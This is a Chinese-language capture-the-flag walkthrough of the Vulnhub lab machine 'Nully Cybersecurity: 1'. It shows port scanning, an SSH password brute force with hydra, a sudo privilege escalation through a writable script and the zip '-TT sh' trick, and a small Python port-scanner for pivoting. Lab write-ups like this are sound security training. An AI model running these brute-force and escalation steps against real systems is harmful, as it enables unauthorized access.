Nully Cybersecurity
靶机基本信息
名称:Nully Cybersecurity: 1
地址:
提示:
While working with the machine, you will need to brute force,
pivoting (using metasploit, via portfwd), exploitation web app, and
using searchsploit.
About: Wait 5-8 minutes before starting for the machine to start its services. Also, check the welcome page on port 80.
Hints: 'cat rockyou.txt | grep bobby > wordlist' for generating wordlist.
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.104.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:be:bb:0d 1 60 PCS Systemtechnik GmbH
192.168.56.231 08:00:27:8a:e6:45 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.231
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.231 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 20:35 EST
Nmap scan report for bogon (192.168.56.231)
Host is up (0.000098s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to the Nully Cybersecurity CTF
|_http-server-header: Apache/2.4.29 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) USER RESP-CODES CAPA AUTH-RESP-CODE UIDL TOP PIPELINING
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8d:c1:b0:f5:0a:3d:1c:32:80:91:14:c5:3b:04:e1:3e (RSA)
| 256 cb:22:f4:e3:e1:f1:61:68:58:91:9a:96:19:35:2c:ff (ECDSA)
|_ 256 a5:e3:48:57:49:55:85:f9:8c:9a:c1:8c:a6:49:f5:2d (ED25519)
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9000/tcp open cslistener?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: max-age=31536000
| Content-Length: 23203
| Content-Type: text/html; charset=utf-8
| Last-Modified: Wed, 22 Jul 2020 22:47:36 GMT
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Mon, 28 Nov 2022 01:35:46 GMT
| <!DOCTYPE html
| ><html lang="en" ng-app="portainer">
| <head>
| <meta charset="utf-8" />
| <title>Portainer</title>
| <meta name="description" content="" />
| <meta name="author" content="Portainer.io" />
| <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
| <!--[if lt IE 9]>
| <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script>
| <![endif]-->
| <!-- Fav and touch icons -->
| <link rel="apple-touch-icon" sizes="180x180" href="dc4d092847be46242d8c013d1bc7c494.png" />
|_ <link rel="icon" type="image/png" sizes="32x32" href="5ba13dcb526292ae707310a54e103cd1.png"
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9000-TCP:V=7.92%I=7%D=11/27%Time=63841072%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,5BC1,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges
SF::\x20bytes\r\nCache-Control:\x20max-age=31536000\r\nContent-Length:\x20
SF:23203\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:
SF:\x20Wed,\x2022\x20Jul\x202020\x2022:47:36\x20GMT\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Mo
SF:n,\x2028\x20Nov\x202022\x2001:35:46\x20GMT\r\n\r\n<!DOCTYPE\x20html\n><
SF:html\x20lang=\"en\"\x20ng-app=\"portainer\">\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20\x20\x20<title>Portain
SF:er</title>\n\x20\x20\x20\x20<meta\x20name=\"description\"\x20content=\"
SF:\"\x20/>\n\x20\x20\x20\x20<meta\x20name=\"author\"\x20content=\"Portain
SF:er\.io\"\x20/>\n\n\x20\x20\x20\x20<!--\x20HTML5\x20shim,\x20for\x20IE6-
SF:8\x20support\x20of\x20HTML5\x20elements\x20-->\n\x20\x20\x20\x20<!--\[i
SF:f\x20lt\x20IE\x209\]>\n\x20\x20\x20\x20\x20\x20<script\x20src=\"//html5
SF:shim\.googlecode\.com/svn/trunk/html5\.js\"></script>\n\x20\x20\x20\x20
SF:<!\[endif\]-->\n\n\x20\x20\x20\x20<!--\x20Fav\x20and\x20touch\x20icons\
SF:x20-->\n\x20\x20\x20\x20<link\x20rel=\"apple-touch-icon\"\x20sizes=\"18
SF:0x180\"\x20href=\"dc4d092847be46242d8c013d1bc7c494\.png\"\x20/>\n\x20\x
SF:20\x20\x20<link\x20rel=\"icon\"\x20type=\"image/png\"\x20sizes=\"32x32\
SF:"\x20href=\"5ba13dcb526292ae707310a54e103cd1\.png\"")%r(HTTPOptions,340
SF:6,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\x20bytes\r\nCache-Control:\
SF:x20max-age=31536000\r\nContent-Length:\x2023203\r\nContent-Type:\x20tex
SF:t/html;\x20charset=utf-8\r\nLast-Modified:\x20Wed,\x2022\x20Jul\x202020
SF:\x2022:47:36\x20GMT\r\nX-Content-Type-Options:\x20nosniff\r\nX-Xss-Prot
SF:ection:\x201;\x20mode=block\r\nDate:\x20Mon,\x2028\x20Nov\x202022\x2001
SF::35:46\x20GMT\r\n\r\n<!DOCTYPE\x20html\n><html\x20lang=\"en\"\x20ng-app
SF:=\"portainer\">\n\x20\x20<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf
SF:-8\"\x20/>\n\x20\x20\x20\x20<title>Portainer</title>\n\x20\x20\x20\x20<
SF:meta\x20name=\"description\"\x20content=\"\"\x20/>\n\x20\x20\x20\x20<me
SF:ta\x20name=\"author\"\x20content=\"Portainer\.io\"\x20/>\n\n\x20\x20\x2
SF:0\x20<!--\x20HTML5\x20shim,\x20for\x20IE6-8\x20support\x20of\x20HTML5\x
SF:20elements\x20-->\n\x20\x20\x20\x20<!--\[if\x20lt\x20IE\x209\]>\n\x20\x
SF:20\x20\x20\x20\x20<script\x20src=\"//html5shim\.googlecode\.com/svn/tru
SF:nk/html5\.js\"></script>\n\x20\x20\x20\x20<!\[endif\]-->\n\n\x20\x20\x2
SF:0\x20<!--\x20Fav\x20and\x20touch\x20icons\x20-->\n\x20\x20\x20\x20<link
SF:\x20rel=\"apple-touch-icon\"\x20sizes=\"180x180\"\x20href=\"dc4d092847b
SF:e46242d8c013d1bc7c494\.png\"\x20/>\n\x20\x20\x20\x20<link\x20rel=\"icon
SF:\"\x20type=\"image/png\"\x20sizes=\"32x32\"\x20href=\"5ba13dcb526292ae7
SF:07310a54e103cd1\.png\"");
MAC Address: 08:00:27:8A:E6:45 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.99 seconds
Get Access
访问端口80,返回页面告知:
To start, check your email on port 110 with authorization data pentester:qKnGByeaeQJWTjj2efHxst7Hu0xHADGO
因此从110端口:
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ telnet 192.168.56.231 110
Trying 192.168.56.231...
Connected to 192.168.56.231.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user pentester
+OK
pass qKnGByeaeQJWTjj2efHxst7Hu0xHADGO
+OK Logged in.
list
+OK 1 messages:
1 657
.
retr 1
+OK 657 octets
Return-Path: <root@MailServer>
X-Original-To: pentester@localhost
Delivered-To: pentester@localhost
Received: by MailServer (Postfix, from userid 0)
id 20AE4A4C29; Tue, 25 Aug 2020 17:04:49 +0300 (+03)
Subject: About server
To: <pentester@localhost>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200825140450.20AE4A4C29@MailServer>
Date: Tue, 25 Aug 2020 17:04:49 +0300 (+03)
From: root <root@MailServer>
Hello,
I'm Bob Smith, the Nully Cybersecurity mail server administrator.
The boss has already informed me about you and that you need help accessing the server.
Sorry, I forgot my password, but I remember the password was simple.
.
现在知道用户名为bob, 而密码列表可以由rockyou.txt生成(作者提示)
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ cat /usr/share/wordlists/rockyou.txt | grep bobby > wordlist
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ ls
login.exe login_support.dll nmap_full_scan wordlist
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ hydra -l bob -P wordlist ssh://192.168.56.231 -s 2222
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-27 20:58:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2453 login tries (l:1/p:2453), ~154 tries per task
[DATA] attacking ssh://192.168.56.231:2222/
[STATUS] 142.00 tries/min, 142 tries in 00:01h, 2313 to do in 00:17h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 2159 to do in 00:22h, 14 active
[2222][ssh] host: 192.168.56.231 login: bob password: bobby1985
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-27 21:04:18
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ ssh [email protected] -p 2222
The authenticity of host '[192.168.56.231]:2222 ([192.168.56.231]:2222)' can't be established.
ED25519 key fingerprint is SHA256:ZU7BEqKthDZgUp1P4/iydwfRHNZnBUzH9kUVbcqbM9A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.231]:2222' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Thu Aug 27 16:14:40 2020 from 172.17.0.1
bob@MailServer:~$ id
uid=1000(bob) gid=1000(bob) groups=1000(bob)
bob@MailServer:~$ sudo -l
Matching Defaults entries for bob on MailServer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on MailServer:
(my2user) NOPASSWD: /bin/bash /opt/scripts/check.sh
bob@MailServer:~$ cat /opt/scripts/check.sh
#!/bin/bash
echo "This is script for check security on the server by laf3r"
echo "Script runned as $USER"
echo " "
echo "Users on the server:"
echo " "
/usr/bin/cat /etc/passwd | grep root
/usr/bin/cat /etc/passwd | grep home
echo "--------------------"
echo " "
echo "Active services:"
echo " "
/usr/sbin/service --status-all | grep +
echo "--------------------"
echo " "
echo "Current network connections:"
echo " "
/usr/bin/netstat -A inet –program
echo "--------------------"
echo " "
echo "Check internet connection (ping goole.com)"
echo " "
if ping www.google.com &> /dev/null; then
echo "Internet connection is active"
else
echo "Internet connection is not available"
fi
echo "--------------------"
echo " "
echo "Active processes:"
echo " "
/usr/bin/ps -aux
echo "--------------------"
echo " "
echo "Web Server files: "
/usr/bin/ls -la /var/www/html
echo "--------------------"
echo " "
echo "List of disks:"
echo " "
/usr/bin/lsblk
echo "--------------------"
bob@MailServer:~$ ls -alh /opt/scripts/check.sh
-rw-r--r-- 1 bob bob 1.3K Aug 25 2020 /opt/scripts/check.sh
bob@MailServer:~$ echo "/bin/bash" >> /opt/scripts/check.sh
bob@MailServer:~$
bob@MailServer:~$ sudo -u my2user /bin/bash /opt/scripts/check.sh
sudo: setrlimit(RLIMIT_CORE): Operation not permitted
This is script for check security on the server by laf3r
Script runned as my2user
Users on the server:
root:x:0:0:root:/root:/bin/bash
bob:x:1000:1000:Bob Smith,,,,I am sysadmin of the Nully Cybersecurity mail server:/home/bob:/bin/bash
my2user:x:1001:1001:,,,:/home/my2user:/bin/bash
pentester:x:1002:1002::/home/pentester:/usr/sbin/nologin
--------------------
Active services:
[ ? ] hwclock.sh
[ + ] postfix
[ + ] ssh
--------------------
Current network connections:
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 36 MailServer:ssh 192.168.56.206:56008 ESTABLISHED
--------------------
Check internet connection (ping goole.com)
Internet connection is not available
--------------------
Active processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4244 3344 pts/0 Ss+ 04:30 0:00 /bin/bash
root 641 0.0 0.1 38036 5248 ? Ss 04:31 0:00 /usr/lib/postfix/sbin/master
postfix 645 0.0 0.1 38064 5344 ? S 04:31 0:00 pickup -l -t unix -u -c
postfix 646 0.0 0.1 38116 5332 ? S 04:31 0:00 qmgr -l -t unix -u
root 652 0.0 0.1 12164 4292 ? Ss 04:31 0:00 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
root 660 0.0 0.0 4536 2724 ? Ss 04:31 0:00 /usr/sbin/dovecot -c /etc/dovecot/dovecot.conf
dovecot 665 0.0 0.0 4248 996 ? S 04:31 0:00 dovecot/anvil
root 666 0.0 0.0 4388 2840 ? S 04:31 0:00 dovecot/log
root 667 0.0 0.1 5536 4160 ? S 04:31 0:00 dovecot/config
dovecot 670 0.0 0.0 4388 2704 ? S 04:35 0:00 dovecot/stats
root 938 0.0 0.1 12640 8052 ? Ss 05:05 0:00 sshd: bob [priv]
bob 953 0.0 0.1 12640 4632 ? S 05:05 0:00 sshd: bob@pts/1
bob 954 0.0 0.0 5996 3852 pts/1 Ss 05:05 0:00 -bash
root 962 0.0 0.0 6756 3776 pts/1 S+ 05:07 0:00 sudo -u my2user /bin/bash /opt/scripts/check.sh
my2user 963 0.0 0.0 5784 3416 pts/1 S+ 05:07 0:00 /bin/bash /opt/scripts/check.sh
my2user 1012 0.0 0.0 7636 3272 pts/1 R+ 05:07 0:00 /usr/bin/ps -aux
--------------------
Web Server files:
/usr/bin/ls: cannot access '/var/www/html': No such file or directory
--------------------
List of disks:
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 20G 0 disk
├─sda1 8:1 0 1M 0 part
├─sda2 8:2 0 1G 0 part
└─sda3 8:3 0 19G 0 part
sr0 11:0 1 1024M 0 rom
--------------------
my2user@MailServer:/home/bob$ id
uid=1001(my2user) gid=1001(my2user) groups=1001(my2user)
my2user@MailServer:/home/bob$
这样就拿到了my2user的shell
my2user@MailServer:/var$ sudo -l
Matching Defaults entries for my2user on MailServer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User my2user may run the following commands on MailServer:
(root) NOPASSWD: /usr/bin/zip
my2user@MailServer:/var$ TF=$(mktemp -u)
my2user@MailServer:/var$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 33%)
# cd /root
# ls -alh
total 40K
drwx------ 1 root root 4.0K Aug 27 2020 .
drwxr-xr-x 1 root root 4.0K Aug 25 2020 ..
-rw------- 1 root root 0 Nov 28 04:31 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 25 2020 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rwxr-xr-x 1 root root 241 Aug 27 2020 .services
drwx------ 2 root root 4.0K Aug 27 2020 .ssh
-rw------- 1 root root 7.7K Aug 27 2020 .viminfo
-rw-r--r-- 1 root root 723 Aug 25 2020 1_flag.txt
# cat 1_flag.txt
.88888. dP dP dP
d8' `88 88 88 88
88 .d8888b. .d8888b. .d888b88 88 .d8888b. 88d888b.
88 YP88 88' `88 88' `88 88' `88 88 88' `88 88' `88
Y8. .88 88. .88 88. .88 88. .88 88. .d8P 88. .88 88. .88
`88888' `88888P' `88888P' `88888P8 `Y8888' `88888P' 88Y8888'
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Mail server is rooted.
You got the first flag: 2c393307906f29ee7fb69e2ce59b4c8a
Now go to the web server and root it.
#
这样就拿到了第一个flag.
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.5 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:05 txqueuelen 0 (Ethernet)
RX packets 3737 bytes 456415 (456.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3546 bytes 512745 (512.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
# hostname
MailServer
# uname -a
Linux MailServer 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
# ping 172.17.0.1
sh: 7: ping: not found
# which python
# which python3
/usr/bin/python3
#
从这些信息可以看出Mail Server 应该运行在容器里,因此第一步需要知道还有哪些主机,而Mail Server里没有ping,我们可以写一个python脚本,看哪个主机运行web
import socket
import sys
def scan_ip(ip):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((ip,80))
print("IP:%s"%ip)
except:
pass
network_prefix = '172.17.0.'
for i in range(1,255):
ip = network_prefix + str(i)
scan_ip(ip)